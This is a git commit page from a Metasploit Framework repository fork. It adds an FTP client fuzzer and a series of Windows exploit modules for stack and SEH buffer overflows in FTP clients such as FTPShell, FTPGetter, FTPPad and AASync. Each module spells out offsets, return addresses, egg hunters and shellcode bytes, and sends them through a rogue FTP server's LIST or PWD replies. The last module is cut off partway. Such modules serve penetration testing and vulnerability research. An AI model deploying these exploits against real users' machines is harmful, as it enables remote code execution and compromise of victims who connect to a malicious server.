dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

add ftp client fuzzer and exploits from corelanc0d3r! 

git-svn-id: file:///home/svn/framework3/trunk@10658 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
Joshua Drake 2010-10-12 17:31:18 +00:00
parent c7fc361140
commit ad4064ed20
12 changed files with 1559 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

431
modules/auxiliary/fuzzers/ftp/client_ftp.rb Normal file
View File

@ -0,0 +1,431 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
#
# Fuzzer written by corelanc0d3r - <peter.ve [at] corelan.be>
# http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
#
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Exploit::Remote::TcpServer
def initialize()
super(
'Name' => 'Simple FTP Client Fuzzer',
'Description' => %q{
This module will serve an FTP server and perform FTP client interaction fuzzing
},
'Author' => [ 'corelanc0d3r' ],
'License' => MSF_LICENSE,
'Version' => "$Revision$",
'References' =>
[
[ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ],
]
)
register_options(
[
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 21 ]),
OptString.new('FUZZCMDS', [ true, "Comma separated list of commands to fuzz.", "LIST,NLST,LS,RETR" ]),
OptInt.new('STARTSIZE', [ true, "Fuzzing string startsize.",1000]),
OptInt.new('ENDSIZE', [ true, "Max Fuzzing string size.",200000]),
OptInt.new('STEPSIZE', [ true, "Increment fuzzing string each attempt.",1000]),
OptBool.new('RESET', [ true, "Reset fuzzing values after client disconnects with QUIT cmd.",true]),
OptString.new('WELCOME', [ true, "FTP Server welcome message.","Evil FTP Server Ready"]),
OptBool.new('CYCLIC', [ true, "Use Cyclic pattern instead of A's (fuzzing payload).",true]),
OptBool.new('ERROR', [ true, "Reply with error codes only",false]),
OptBool.new('EXTRALINE', [ true, "Add extra CRLF's in response to LIST",true])
], self.class)
end
#---------------------------------------------------------------------------------
def setup
super
@state = {}
end
#---------------------------------------------------------------------------------
def run
@fuzzsize=datastore['STARTSIZE'].to_i
exploit()
end
#---------------------------------------------------------------------------------
# Handler for new FTP client connections
#---------------------------------------------------------------------------------
def on_client_connect(c)
@state[c] = {
:name => "#{c.peerhost}:#{c.peerport}",
:ip => c.peerhost,
:port => c.peerport,
:user => nil,
:pass => nil
}
#set up an active data port on port 20
print_status("Client connected : " + c.peerhost)
active_data_port_for_client(c, 20)
send_response(c,"","WELCOME",220," "+datastore['WELCOME'])
#from this point forward, on_client_data() will take over
end
def on_client_close(c)
@state.delete(c)
end
#---------------------------------------------------------------------------------
# Active and Passive data connections
#---------------------------------------------------------------------------------
def passive_data_port_for_client(c)
@state[c][:mode] = :passive
if(not @state[c][:passive_sock])
s = Rex::Socket::TcpServer.create(
'LocalHost' => '0.0.0.0',
'LocalPort' => 0,
'Context' => { 'Msf' => framework, 'MsfExploit' => self }
)
dport = s.getsockname[2]
@state[c][:passive_sock] = s
@state[c][:passive_port] = dport
print_status(" - Set up passive data port #{dport}")
end
@state[c][:passive_port]
end
def active_data_port_for_client(c,port)
@state[c][:mode] = :active
connector = Proc.new {
host = c.peerhost.dup
sock = Rex::Socket::Tcp.create(
'PeerHost' => host,
'PeerPort' => port,
'Context' => { 'Msf' => framework, 'MsfExploit' => self }
)
}
@state[c][:active_connector] = connector
@state[c][:active_port] = port
print_status(" - Set up active data port #{port}")
end
def establish_data_connection(c)
print_status(" - Establishing #{@state[c][:mode]} data connection")
begin
Timeout.timeout(20) do
if(@state[c][:mode] == :active)
return @state[c][:active_connector].call()
end
if(@state[c][:mode] == :passive)
return @state[c][:passive_sock].accept
end
end
print_status(" - Data connection active")
rescue ::Exception => e
print_error("Failed to establish data connection: #{e.class} #{e}")
end
nil
end
#---------------------------------------------------------------------------------
# FTP Client-to-Server Command handlers
#---------------------------------------------------------------------------------
def on_client_data(c)
#get the client data
data = c.get_once
return if not data
#split data into command and arguments
cmd,arg = data.strip.split(/\s+/, 2)
arg ||= ""
return if not cmd
#convert commands to uppercase and strip spaces
case cmd.upcase.strip
when 'USER'
@state[c][:user] = arg
send_response(c,arg,"USER",331," User name okay, need password")
return
when 'PASS'
@state[c][:pass] = arg
send_response(c,arg,"PASS",230,"-Password accepted.\r\n230 User logged in.")
return
when 'QUIT'
if (datastore['RESET'])
print_status("Resetting fuzz settings")
@fuzzsize = datastore['STARTSIZE']
@stepsize = datastore['STEPSIZE']
end
print_status("** Client disconnected **")
send_response(c,arg,"QUIT",221," User logged out")
return
when 'SYST'
send_response(c,arg,"SYST",215," UNIX Type: L8")
return
when 'TYPE'
send_response(c,arg,"TYPE",200," Type set to #{arg}")
return
when 'CWD'
send_response(c,arg,"CWD",250," CWD Command successful")
return
when 'PWD'
send_response(c,arg,"PWD",257," \"/\" is current directory.")
return
when 'REST'
send_response(c,arg,"REST",200," OK")
return
when 'XPWD'
send_response(c,arg,"PWD",257," \"/\" is current directory")
return
when 'SIZE'
send_response(c,arg,"SIZE",213," 1")
return
when 'MDTM'
send_response(c,arg,"MDTM",213," #{Time.now.strftime("%Y%m%d%H%M%S")}")
return
when 'CDUP'
send_response(c,arg,"CDUP",257," \"/\" is current directory")
return
when 'PORT'
port = arg.split(',')[4,2]
if(not port and port.length == 2)
c.put("500 Illegal PORT command.\r\n")
return
end
port = port.map{|x| x.to_i}.pack('C*').unpack('n')[0]
active_data_port_for_client(c, port)
send_response(c,arg,"PORT",200," PORT command successful")
return
when 'PASV'
print_status("Handling #{cmd.upcase} command")
daddr = Rex::Socket.source_address(c.peerhost)
dport = passive_data_port_for_client(c)
@state[c][:daddr] = daddr
@state[c][:dport] = dport
pasv = (daddr.split('.') + [dport].pack('n').unpack('CC')).join(',')
dofuzz = fuzz_this_cmd("PASV")
code = 227
if datastore['ERROR']
code = 557
end
if (dofuzz==1)
print_status(" * Fuzzing response for PASV, payload length #{@fuzzdata.length}")
send_response(c,arg,"PASV",code," Entering Passive Mode (#{@fuzzdata},1,1,1,1,1)\r\n")
incr_fuzzsize()
else
send_response(c,arg,"PASV",code," Entering Passive Mode (#{pasv})")
end
return
when /^(LIST|NLST|LS)$/
#special case - requires active/passive connection
print_status("Handling #{cmd.upcase} command")
conn = establish_data_connection(c)
if(not conn)
c.put("425 Can't build data connection\r\n")
return
end
print_status(" - Data connection set up")
code = 150
if datastore['ERROR']
code = 550
end
c.put("#{code} Here comes the directory listing.\r\n")
code = 226
if datastore['ERROR']
code = 550
end
c.put("#{code} Directory send ok.\r\n")
strfile = "passwords.txt"
strfolder = "Secret files"
dofuzz = fuzz_this_cmd("LIST")
if (dofuzz==1)
strfile = @fuzzdata + ".txt"
strfolder = @fuzzdata
paylen = @fuzzdata.length
print_status("* Fuzzing response for LIST, payload length #{paylen}")
incr_fuzzsize()
end
print_status(" - Sending directory list via data connection")
dirlist = ""
if datastore['EXTRALINE']
extra = "\r\n"
else
extra = ""
end
dirlist = "drwxrwxrwx 1 100 0 11111 Jun 11 21:10 #{strfolder}\r\n" + extra
dirlist << "-rw-rw-r-- 1 1176 1176 1060 Aug 16 22:22 #{strfile}\r\n" + extra
conn.put("total 2\r\n"+dirlist)
conn.close
return
when 'RETR'
#special case - requires active/passive connection
print_status("Handling #{cmd.upcase} command")
conn = establish_data_connection(c)
if(not conn)
c.put("425 Can't build data connection\r\n")
return
end
print_status(" - Data connection set up")
strcontent = "blahblahblah"
dofuzz = fuzz_this_cmd("LIST")
if (dofuzz==1)
strcontent = @fuzzdata
paylen = @fuzzdata.length
print_status("* Fuzzing response for RETR, payload length #{paylen}")
incr_fuzzsize()
end
c.put("150 Opening BINARY mode data connection #{strcontent}\r\n")
print_status(" - Sending data via data connection")
conn.put(strcontent)
c.put("226 Transfer complete\r\n")
conn.close
return
when /^(STOR|MKD|REM|DEL|RMD)$/
send_response(c,arg,cmd.upcase,500," Access denied")
return
when 'FEAT'
send_response(c,arg,"FEAT","","211-Features:\r\n211 End")
return
when 'HELP'
send_response(c,arg,"HELP",214," Syntax: #{arg} - (#{arg}-specific commands)")
when 'SITE'
send_response(c,arg,"SITE",200," OK")
return
when 'NOOP'
send_response(c,arg,"NOOP",200," OK")
return
when 'ABOR'
send_response(c,arg,"ABOR",225," Abor command successful")
return
when 'ACCT'
send_response(c,arg,"ACCT",200," OK")
return
when 'RNFR'
send_response(c,arg,"RNRF",350," File exists")
return
when 'RNTO'
send_response(c,arg,"RNTO",350," File exists")
return
else
send_response(c,arg,cmd.upcase,200," Command not understood")
return
end
return
end
#---------------------------------------------------------------------------------
# Fuzzer functions
#---------------------------------------------------------------------------------
# Do we need to fuzz this command ?
def fuzz_this_cmd(cmd)
@fuzzcommands = datastore['FUZZCMDS'].split(",")
fuzzme = 0
@fuzzcommands.each do |thiscmd|
if ((cmd.upcase == thiscmd.upcase) || (thiscmd=="*")) && (fuzzme==0)
fuzzme = 1
end
end
if fuzzme==1
# should we use a cyclic pattern, or just A's ?
if datastore['CYCLIC']
@fuzzdata = Rex::Text.pattern_create(@fuzzsize)
else
@fuzzdata = "A" * @fuzzsize
end
end
return fuzzme
end
def incr_fuzzsize
@stepsize = datastore['STEPSIZE'].to_i
@fuzzsize = @fuzzsize + @stepsize
print_status("(i) Setting next payload size to #{@fuzzsize}")
if (@fuzzsize > datastore['ENDSIZE'].to_i)
@fuzzsize = datastore['ENDSIZE'].to_i
end
end
# Send data back to the server
def send_response(c,arg,cmd,code,msg)
if arg.length > 40
showarg = arg[0,40] + "..."
else
showarg = arg
end
if cmd.length > 40
showcmd = cmd[0,40] + "..."
else
showcmd = cmd
end
print_status("Sending response for '#{showcmd}' command, arg #{showarg}")
dofuzz = fuzz_this_cmd(cmd)
## Fuzz this command ? (excluding PASV, which is handled in the command handler)
if (dofuzz==1) && (cmd.upcase != "PASV")
paylen = @fuzzdata.length
print_status("* Fuzzing response for #{cmd.upcase}, payload length #{paylen}")
if datastore['ERROR']
code = "550 "
end
if cmd=="FEAT"
@fuzzdata = "211-Features:\r\n @fuzzdata\r\n211 End"
end
if cmd=="PWD"
@fuzzdata = " \"/"+@fuzzdata+"\" is current directory"
end
cmsg = code.to_s + " " + @fuzzdata
c.put("#{cmsg}\r\n")
print_status("* Fuzz data sent")
incr_fuzzsize()
else
#Do not fuzz
cmsg = code.to_s + msg
cmsg = cmsg.strip
c.put("#{cmsg}\r\n")
end
return
end
end

110
modules/exploits/windows/ftp/32bitftp_list_reply.rb Normal file
View File

@ -0,0 +1,110 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::FtpServer
def initialize(info = {})
super(update_info(info,
'Name' => '32bit FTP Client Stack Buffer Overflow ',
'Description' => %q{
This module exploits a stack buffer overflow in 32bit ftp client, triggered when trying to
download a file that has an overly long filename.
},
'Author' =>
[
'fancy', # found the bug
'corelanc0d3r' # helped writing this module
],
'License' => MSF_LICENSE,
'Version' => "$Revision$",
'References' =>
[
[ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'BadChars' => "\x00\xff\x0a",
},
'Platform' => 'win',
'Targets' =>
[
[ 'XP Universal', { 'Offset' => 259, 'Ret' => 0x004393ED } ], #RETN 32bitftp.exe
],
'Privileged' => false,
'DisclosureDate' => 'Oct 12 2010',
'DefaultTarget' => 0))
end
def setup
super
end
def on_client_unknown_command(c,cmd,arg)
c.put("200 OK\r\n")
end
def on_client_command_list(c,arg)
code = 150
c.put("#{code} OK.\r\n")
code = 226
c.put("#{code} Directory ok.\r\n")
conn = establish_data_connection(c)
if(not conn)
c.put("425 Can't build data connection\r\n")
return
end
print_status(" - Data connection set up")
filename = "\x02" #prevent crash
filename << "secret admin passwords.txt" #se = \x73\x65 = jump forward, over filename, to hunter
filename << " " * 77
#custom encoded egg hunter
filename << "\x89\xe2\xda\xd6\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
filename << "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
filename << "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
filename << "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
filename << "\x45\x36\x4b\x31\x4a\x6a\x49\x6f\x44\x4f\x42\x62\x50\x52\x43"
filename << "\x5a\x45\x52\x46\x38\x48\x4d\x44\x6e\x45\x6c\x45\x55\x43\x6a"
filename << "\x50\x74\x4a\x4f\x4d\x68\x43\x47\x44\x70\x46\x50\x43\x44\x4e"
filename << "\x6b\x4b\x4a\x4c\x6f\x43\x45\x49\x7a\x4c\x6f\x44\x35\x4a\x47"
filename << "\x4b\x4f\x4d\x37\x41\x41"
filename << " " * (target['Offset']-filename.length)
addr1 = "\x40\x60\x3A\x76" # RW imm32.dll
addr2 = "\x44\x54\x48\x00" # data section 32bitftp.exe
addr3 = [target.ret].pack('V') # b00m !
strfile = filename
strfile << addr3
strfile << addr2
strfile << addr1
strfile << "w00tw00t"
strfile << payload.encoded
print_status(" - Sending directory list via data connection")
dirlist = "-rw-rw-r-- 1 1176 1176 1060 Apr 23 23:17 #{strfile}.bin\r\n\r\n"
conn.put(dirlist)
conn.close
print_status(" - LIST sent, wait for user to double click file...")
return
end
end

90
modules/exploits/windows/ftp/aasync_list_reply.rb Normal file
View File

@ -0,0 +1,90 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::FtpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST)',
'Description' => %q{
This module exploits a stack buffer overflow in AASync v2.2.1.0, triggered when processing the response on a LIST command. During the overflow, a structured exception handler record gets overwritten.
},
'Author' =>
[
'corelanc0d3r', #found bug and wrote the exploit
],
'License' => MSF_LICENSE,
'Version' => "$Revision$",
'References' =>
[
[ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'BadChars' => "\x00\xff\x0d\x5c\x2f\x0a",
},
'Platform' => 'win',
'Targets' =>
[
[ 'XP SP3 Universal', { 'Offset' => 6340,'Ret' => 0x61181674 } ], # ppr [pthreadgc2.dll]
],
'Privileged' => false,
'DisclosureDate' => 'Oct 12 2010',
'DefaultTarget' => 0))
end
#---------------------------------------------------------------------------------
def setup
super
end
def on_client_unknown_command(c,cmd,arg)
c.put("200 OK\r\n")
end
def on_client_command_list(c,arg)
conn = establish_data_connection(c)
if(not conn)
c.put("425 Can't build data connection\r\n")
return
end
print_status(" - Data connection set up")
code = 150
c.put("#{code} Here comes the directory listing.\r\n")
code = 226
c.put("#{code} Directory send ok.\r\n")
offset_to_nseh = target['Offset']
filename = "admin passwords.txt"
padding = " " * (offset_to_nseh-filename.length)
nseh = "\xeb\x0c\x41\x41"
seh = [target.ret].pack('V') #\x74\x16 = jump
nops = "A" * 30
junk2 = "A" * 5000
#dual offsets to seh
buffer = filename + padding + nseh + seh + seh + nops + payload.encoded + junk2
print_status(" - Sending directory list via data connection")
dirlist = "-rw-rw-r-- 1 1176 1176 1060 Aug 16 22:22 #{buffer}\r\n"
conn.put(dirlist)
conn.close
print_status(" - Payload sent")
return
end
end

114
modules/exploits/windows/ftp/filewrangler_list_reply.rb Normal file
View File

@ -0,0 +1,114 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::FtpServer
include Msf::Exploit::Remote::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'FileWrangler 5.30 Buffer Overflow',
'Description' => %q{
This module exploits an SEH overwrite in the FileWrangler client
that is triggered when the client connects to a FTP server and lists
the directory contents, containing an overly long directory name..
},
'Author' =>
[
'nullthreat', # found bug
'corelanc0d3r' # wrote the exploit
],
'License' => MSF_LICENSE,
'Version' => "$Revision$",
'References' =>
[
[ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 3000,
'BadChars' => "\x00\x0d\x1a\x2a\x51",
'StackAdjustment' => -5000,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal', { 'Offset' => 4082, 'Ret' => 0x0042BE63 } ], #ppr [wrangler.exe]
],
'Privileged' => false,
'DisclosureDate' => 'Oct 12 2010',
'DefaultTarget' => 0))
end
def setup
super
end
def on_client_unknown_command(c,cmd,arg)
c.put("200 OK\r\n")
end
def on_client_command_list(c,arg)
conn = establish_data_connection(c)
if(not conn)
c.put("425 Can't build data connection\r\n")
return
end
print_status(" - Data connection set up")
code = 150
c.put("#{code} Here comes the directory listing.\r\n")
code = 226
c.put("#{code} Directory send ok.\r\n")
# create the egg hunter
print_status(" - Creating the Egg Hunter")
badchars = ""
eggoptions =
{
:checksum => true,
:eggtag => "W00T"
}
hunter,egg = generate_egghunter(payload.encoded,badchars,eggoptions)
# create hunter
predator = "\x90" * 42
predator << hunter
# create the crash payload
crash = rand_text_alpha(target['Offset'] - (egg.length + predator.length))
# Set nseh to jump back 50 (before egghunter)
jmp = "\x90" * 5 + "\xE9\xC9\xFF\xFF\xFF"
nseh = "\xEB\xF9\x90\x90" # NSEH
seh = [target.ret].pack('V')
print_status(" - Building the Buffer")
buffer = crash + egg + predator + jmp + nseh + seh
strfolder = buffer + "B" * (5000-buffer.length) #make sure it dies
print_status(" - Sending directory list via data connection")
dirlist ="drwxrwxrwx 1 100 0 11111 Jun 11 21:10 #{strfolder}\r\n"
conn.put(dirlist)
conn.close
print_status(" - Waiting for egghunter...")
return
end
end

91
modules/exploits/windows/ftp/ftpgetter_pwd_reply.rb Normal file
View File

@ -0,0 +1,91 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::FtpServer
include Msf::Exploit::Remote::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD)',
'Description' => %q{
This module exploits a SEH overflow in FTPGetter Standard v3.55.0.05 ftp client, triggered
when processing the response on a PWD command.
},
'Author' =>
[
'ekse', # found the bug
'corelanc0d3r', # wrote the exploit
],
'License' => MSF_LICENSE,
'Version' => "$Revision$",
'References' =>
[
[ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'BadChars' => "\x00\xff\x0d\x5c\x2f\x0a",
},
'Platform' => 'win',
'Targets' =>
[
[ 'XP SP3 Universal', { 'Offset' => 485, 'Ret' => 0x100139E5 } ], # ppr [ssleay32.dll]
],
'Privileged' => false,
'DisclosureDate' => 'Oct 12 2010',
'DefaultTarget' => 0))
end
def setup
super
badchars = ""
eggoptions =
{
:checksum => true,
:eggtag => "W00T"
}
@hunter,@egg = generate_egghunter(payload.encoded,badchars,eggoptions)
end
def on_client_unknown_command(c,cmd,arg)
c.put("200 OK\r\n")
end
def on_client_command_pass(c,arg)
@state[c][:pass] = arg
c.put("230 OK #{@egg}\r\n")
return
end
def on_client_command_pwd(c,arg)
junk1 = "A" * target['Offset']
junk2 = "A" * 9
nseh = "\x74\x06\x41\x41"
jmp = "\x75\x08"
seh = [target.ret].pack('V')
junk3 = "D" * 22000
#dual offset
buffer = junk1 + nseh + seh + junk2 + jmp + nseh + seh + @hunter + junk3
c.put("257 \"/\" #{buffer}\r\n")
print_status("Sent payload, #{buffer.length} bytes")
print_status("Wait for hunter ...")
return
end
end

98
modules/exploits/windows/ftp/ftppad_list_reply.rb Normal file
View File

@ -0,0 +1,98 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Exploit::Remote
include Exploit::Remote::FtpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'FTPPad 1.2.0 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow FTPPad 1.2.0 ftp client.
The overflow is triggered when the client connects to a FTP server
which sends an overly long directory and filename in response to a
LIST command.
This will cause an access violation, and will eventually overwrite the
saved extended instruction pointer.
Payload can be found at EDX+5c and ESI+5c, so a little pivot/sniper was needed
to make this one work.
},
'Author' =>
[
'corelanc0d3r'
],
'License' => MSF_LICENSE,
'Version' => "$Revision$",
'References' =>
[
[ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 3000,
'BadChars' => "\x00\x0a\x2f\x5c\xff\x0c\x0d\x08\x09",
'DisableNops' => true,
},
'Platform' => 'win',
'Targets' =>
[
#shlwapi sniper + pivot : MOV DWORD PTR DS:[EDX],EAX + CALL ESI
[ 'XP SP3 Professional, English - shlwapi 6.00.2900.5912', { 'Ret' => 0x77FA6556 } ],
[ 'XP SP3 Professional, German - shlwapi 6.00.2900.5912' , { 'Ret' => 0x77f86556 } ],
[ 'XP SP3 Professional, English - shlwapi 6.00.2900.5512', { 'Ret' => 0x77FA6526 } ],
],
'Privileged' => false,
'DisclosureDate' => 'Oct 12 2010',
'DefaultTarget' => 0))
end
def setup
super
end
def on_client_unknown_command(c,cmd,arg)
c.put("200 OK\r\n")
end
def on_client_command_list(c,arg)
conn = establish_data_connection(c)
if(not conn)
c.put("425 Can't build data connection\r\n")
return
end
print_status(" - Data connection set up")
code = 150
c.put("#{code} Here comes the directory listing.\r\n")
code = 226
c.put("#{code} Directory send ok.\r\n")
totalsize = 13000
foldername = "A" * 24 + payload.encoded + ("A" * (3318-payload.encoded.length))
#EDX+5c and ESI+5c point at shellcode
#we control EAX and EIP
#use value in EAX to write to EDX (to make a jump forward, about 5c bytes)
#and then jump to ESI (which will then execute the jump forward, to payload)
foldername << [target.ret].pack('V') # MOV DWORD PTR DS:[EDX],EAX # ... # CALL ESI
foldername << "\x41\x41\x75\x5B" # EAX -> 75 5B = JNZ SHORT -> shellcode
foldername << " " * (totalsize - foldername.length)
print_status(" - Sending directory list via data connection")
dirlist = "drwxrwxrwx 1 100 0 11111 Jun 11 21:10 #{foldername}\r\n"
conn.put(dirlist + dirlist + dirlist + dirlist)
conn.close
return
end
end

86
modules/exploits/windows/ftp/ftpshell51_pwd_reply.rb Normal file
View File

@ -0,0 +1,86 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Exploit::Remote
include Exploit::Remote::FtpServer
include Exploit::Remote::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'FTPShell 5.1 Stack Buffer Overflow',
'Description' => %q{ This module exploits a stack buffer overflow in FTPShell 5.1. The overflow gets
triggered when the ftp clients tries to process an overly response to a PWD command.
This will overwrite the saved EIP and structured exception handler.
},
'Author' =>
[
'corelanc0d3r' #found bug, wrote the exploit
],
'License' => MSF_LICENSE,
'Version' => "$Revision$",
'References' =>
[
[ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'BadChars' => "\x00\xff\x0d\x5c\x2f\x0a",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP Universal', { 'Offset' => 399, 'Ret' => 0x779A5483 } ], #jmp ebp [setupapi.dll]]
],
'Privileged' => false,
'DisclosureDate' => 'Oct 12 2010',
'DefaultTarget' => 0))
end
def setup
super
end
def on_client_unknown_command(c,cmd,arg)
c.put("200 OK\r\n")
end
def on_client_command_pwd(c,arg)
badchars = ""
eggoptions =
{
:checksum => true,
:eggtag => "w00t"
}
hunter,egg = generate_egghunter(payload.encoded,badchars,eggoptions)
print_status(" - PWD command -> Sending payload")
junk = "A" * target['Offset']
nops = "A" * 10
tweakhunter = "\x5a\x5a"
eip = [target.ret].pack('V')
buffer = junk + eip + nops + tweakhunter + hunter + egg
pwdoutput = "257 \"/" + buffer+ "\" is current directory\r\n"
c.put(pwdoutput)
print_status(" - Sent #{pwdoutput.length} bytes, wait for hunter")
return
end
end

104
modules/exploits/windows/ftp/ftpsynch_list_reply.rb Normal file
View File

@ -0,0 +1,104 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Exploit::Remote
include Exploit::Remote::FtpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'FTP Synchronizer Professional 4.0.73.274',
'Description' => %q{ This module exploits a stack buffer overflow vulnerability in
FTP Synchronizer Pro 4.0.73.274
The overflow gets triggered by sending an overly long filename to the client
in response to a LIST command.
The LIST command gets issued when doing a preview or when you have just created a new
sync profile and allow the tool to see the differences.
This will overwrite a structured exception handler and trigger an access violation.
},
'Author' =>
[
'myne-us', #found the bug
'corelanc0d3r' #wrote the exploit
],
'License' => MSF_LICENSE,
'Version' => "$Revision$",
'References' =>
[
[ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'BadChars' => "\x00\x0a\x2f\x5c",
},
'Platform' => 'win',
'Targets' =>
[
[ 'XP Universal', { 'Offset' => 854, 'Ret' => "\x2D\x78" } ], # p/p/r FTPSynchronizer.exe
],
'Privileged' => false,
'DisclosureDate' => 'Oct 12 2010',
'DefaultTarget' => 0))
end
def setup
super
end
def on_client_unknown_command(c,cmd,arg)
c.put("200 OK\r\n")
end
def on_client_command_list(c,arg)
conn = establish_data_connection(c)
if(not conn)
c.put("425 Can't build data connection\r\n")
return
end
print_status(" - Data connection set up")
code = 150
c.put("#{code} Here comes the directory listing.\r\n")
code = 226
c.put("#{code} Directory send ok.\r\n")
totalsize = 4000
foldername = "A" * target['Offset']
nseh = "\x61\x42"
seh = "\x2D\x78"
sehpad = "\x44\x62"
align = "\x53\x62\x58\x62"
align << "\x40\x62"
align << "\x05\x11\x10\x62"
align << "\x2d\x10\x10\x62"
padding = ("\x42\x62" * 53) + ("\x48\x62")
#basereg EAX, Unicode encoded egghunter
hunter = "PPYAIAIAIAIAQATAXAZAPA3QADAZ"
hunter << "ABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAX"
hunter << "A58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA"
hunter << "BAB30APB944JBQVE1HJKOLOPB0RBJLBQHHMNNOLM5PZ4"
hunter << "4JO7H2WP0P0T4TKZZFOSEZJ6OT5K7KO9WA"
buffer = foldername + nseh + seh + sehpad + align + padding + hunter
junk = "D" * (totalsize-buffer.length)
buffer << junk
print_status(" - Sending directory list via data connection")
dirlist = "drwxrwxrwx 1 100 0 11111 Jun 11 21:10 #{"w00tw00t"+payload.encoded}\r\n"
dirlist << "-rw-rw-r-- 1 1176 1176 1060 Aug 16 22:22 #{buffer}\r\n"
conn.put("total 2\r\n"+dirlist)
print_status(" - Payload sent, wait for hunter...")
conn.close
return
end
end

113
modules/exploits/windows/ftp/gekkomgr_list_reply.rb Normal file
View File

@ -0,0 +1,113 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::FtpServer
include Exploit::Remote::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'Gekko Manager FTP Client Stack Buffer Overflow ',
'Description' => %q{
This module exploits a SEH overflow in Gekko Manager ftp client, triggered when
processing the response received after sending a LIST request.
If this response contains a long filename, a buffer overflow occurs, overwriting
a structured exception handler.
},
'Author' =>
[
'nullthreat', # found the bug
'corelanc0d3r', # wrote the exploit
],
'License' => MSF_LICENSE,
'Version' => "$Revision$",
'References' =>
[
[ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'BadChars' => "\x00\xff\x0d\x5c\x2f\x0a",
},
'Platform' => 'win',
'Targets' =>
[
[ 'XP SP3 Universal', { 'Offset' => 376, 'Ret' => 0x00553C72 } ], # ppr Gekko manager.exe
],
'Privileged' => false,
'DisclosureDate' => 'Oct 12 2010',
'DefaultTarget' => 0))
end
